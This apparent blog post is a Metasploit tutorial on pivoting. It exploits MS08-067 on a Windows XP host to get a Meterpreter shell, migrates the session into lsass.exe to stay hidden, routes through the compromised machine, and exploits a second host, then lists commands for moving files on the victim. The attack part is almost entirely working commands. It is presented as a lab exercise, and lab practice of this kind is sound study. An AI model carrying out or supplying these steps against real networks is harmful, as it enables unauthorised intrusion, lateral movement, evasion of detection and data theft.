Pivoting refers to the practice of hacking a network computer or server and then using that host to attack other computer systems from within the network. By launching attacks from within the network, the attacker bypasses firewall policy and can execute attacks that would not be possible from outside the network. By using a compromised system to launch attacks from, the attacker has an improved prospect of remaining undetected and can leave less of a fingerprint.
Exploit:
In the example pentest below, the goal is to exploit a host on the network and establish a hidden Meterpreter session, then using pivoting, exploit another host on the network..
Requirements:
The pentest exercise was conducted with the Backtrack5 VMware virtual machine against two hosts running WindowsXP Pro - Service Pack 2..
Exploit steps:
Open a terminal in Backtrack and enter the following commands:
#msfconsole
msf > show exploits
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit (ms08_067_netapi) > show options
msf exploit (ms08_067_netapi) > set RHOST <1st victim's ip address>
RHOST => <ip address>
msf exploit (ms08_067_netapi) > exploit //if you are successful, you will see a meterpreter prompt
meterpreter > //if you see this you have a Meterpreter shell
meterpreter > shell //this will give you a Windows command prompt/shell
C:\WINDOWS\sytem32> exit //exit out of the Windows command prompt
meterpreter > getpid //note the process id that Meterpreter is using
meterpreter > ps //list all running process on the victim machine. What process does your PID shows up as? svchost.exe? Look for the process "lsass.exe" , it may show up as PID 700
meterpreter > migrate 700 //migrate Meterpreter to the lsass.exe process
meterpreter > getpid //verify your new process ID
ctrl+z //Key in ctrl+z to background the Meterpreter session
msf > route add <2nd victim's ip address> <subnet mask> <session id #> //route a new attack to victim 2
msf > use windows/smb/ms08_067_netapi
msf exploit (ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit (ms08_067_netapi) > set RHOST <2nd victim's ip address>
msf exploit (ms08_067_netapi) > exploit
meterpreter > //success!!!!
Now that you have a meterpreter shell the sky is the limit. Run a help command to see all of the commands available to you. Try creating a directory or file on the victim machine, or uploading or downloading a file to and from the victim. Here are some of the basic meterpreter commands:..
meterpreter > help //help menu
meterpreter > background //backgrounds the current session
meterpreter > exit //terminate the meterpreter session
meterpreter > quit //terminate the meterpreter session
meterpreter > write //writes data to a channel
meterpreter > mkdir //creates a directory
meterpreter > download //download a file or directory
meterpreter > upload //upload a file or directory
meterpreter > search //search for a file
No comments:
Post a Comment